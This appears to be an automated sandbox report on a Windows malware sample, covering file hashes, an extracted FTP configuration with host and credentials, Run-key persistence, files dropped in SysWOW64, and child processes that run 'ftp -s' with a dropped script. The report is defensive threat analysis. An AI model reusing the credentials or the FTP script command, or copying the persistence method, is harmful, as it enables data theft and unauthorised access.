Analysis
-
max time kernel
140s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 14:14
Static task
static1
Behavioral task
behavioral1
Sample
67d367bc9ee39808f43c49bc10a824eb.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
67d367bc9ee39808f43c49bc10a824eb.exe
Resource
win10v2004-20231215-en
General
-
Target
67d367bc9ee39808f43c49bc10a824eb.exe
-
Size
29KB
-
MD5
67d367bc9ee39808f43c49bc10a824eb
-
SHA1
e0f5722eb1f145a6faccd4186fcdb529b6373388
-
SHA256
0dc1858d8a83eb6cd4fb768d330b3d5872315db5c4a8486983eb64093c3df314
-
SHA512
b052b179d3a9fd5c7ff9366b9ae7f7e2391c9901299057677e593df20950ac02c107132ec986aeffef0322f0085e9af51dfcd2314dfec2c2ba5bfd2a23095a51
-
SSDEEP
384:TG7qKuhKZUPX27xYiVY5XUIgNrMBz5aJGOHn1YynPCn+brkOM3kdKG:TGDuiVY5X4rMBz4GOHn1YyPCn+cZkcG
Malware Config
Extracted
Protocol: ftp- Host:
ftp.webzdarma.cz - Port:
21 - Username:
00000004.webzdarma.cz - Password:
44440000
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Driver for 32bit = "S32." 67d367bc9ee39808f43c49bc10a824eb.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\SysWOW64\S32.EXE 67d367bc9ee39808f43c49bc10a824eb.exe File opened for modification C:\Windows\SysWOW64\S32.EXE 67d367bc9ee39808f43c49bc10a824eb.exe File created C:\Windows\SysWOW64\tmp.~ 67d367bc9ee39808f43c49bc10a824eb.exe File opened for modification C:\Windows\SysWOW64\tmp.~ 67d367bc9ee39808f43c49bc10a824eb.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1860 wrote to memory of 2796 1860 67d367bc9ee39808f43c49bc10a824eb.exe 28 PID 1860 wrote to memory of 2796 1860 67d367bc9ee39808f43c49bc10a824eb.exe 28 PID 1860 wrote to memory of 2796 1860 67d367bc9ee39808f43c49bc10a824eb.exe 28 PID 1860 wrote to memory of 2796 1860 67d367bc9ee39808f43c49bc10a824eb.exe 28 PID 1860 wrote to memory of 2928 1860 67d367bc9ee39808f43c49bc10a824eb.exe 32 PID 1860 wrote to memory of 2928 1860 67d367bc9ee39808f43c49bc10a824eb.exe 32 PID 1860 wrote to memory of 2928 1860 67d367bc9ee39808f43c49bc10a824eb.exe 32 PID 1860 wrote to memory of 2928 1860 67d367bc9ee39808f43c49bc10a824eb.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\67d367bc9ee39808f43c49bc10a824eb.exe"C:\Users\Admin\AppData\Local\Temp\67d367bc9ee39808f43c49bc10a824eb.exe"1⤵
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\SysWOW64\ftp.exeftp -v -i -s:C:\Windows\system32\tmp.~2⤵PID:2796
-
-
C:\Windows\SysWOW64\ftp.exeftp -v -i -s:C:\Windows\system32\tmp.~2⤵PID:2928
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114B
MD5d459fec952a489a266ceea10fd8f7328
SHA18401de317b9150f69a489946b29d8dcec0341b7d
SHA25652a944237254944dcddb4d28e853866b896d2ebbfcbe43011a23de7b8f517586
SHA51299786c1b3c9baf90813938e0d8fd49e334df1c0ac7f5def08ecd6079c7569100fcb6637d005aad19eaec9819edc68409b6a25949bf0d44a99d1c3ca171031775
-
Filesize
118B
MD5996227809eae43e87dedf86046794437
SHA1acdb28d948d34eed4d85089b622a95d44382bb06
SHA256a819d367c9c9d66582afc3a51514c99a88bc0adebfd08cb8ae752b736590427d
SHA512c8ba777dab80d23587e58187aec267cc7e717dded72927c0bfd594684facd868cb50547b560a3419d24c500b72b7377c0f74c16d90768a0fd81a739de48b8789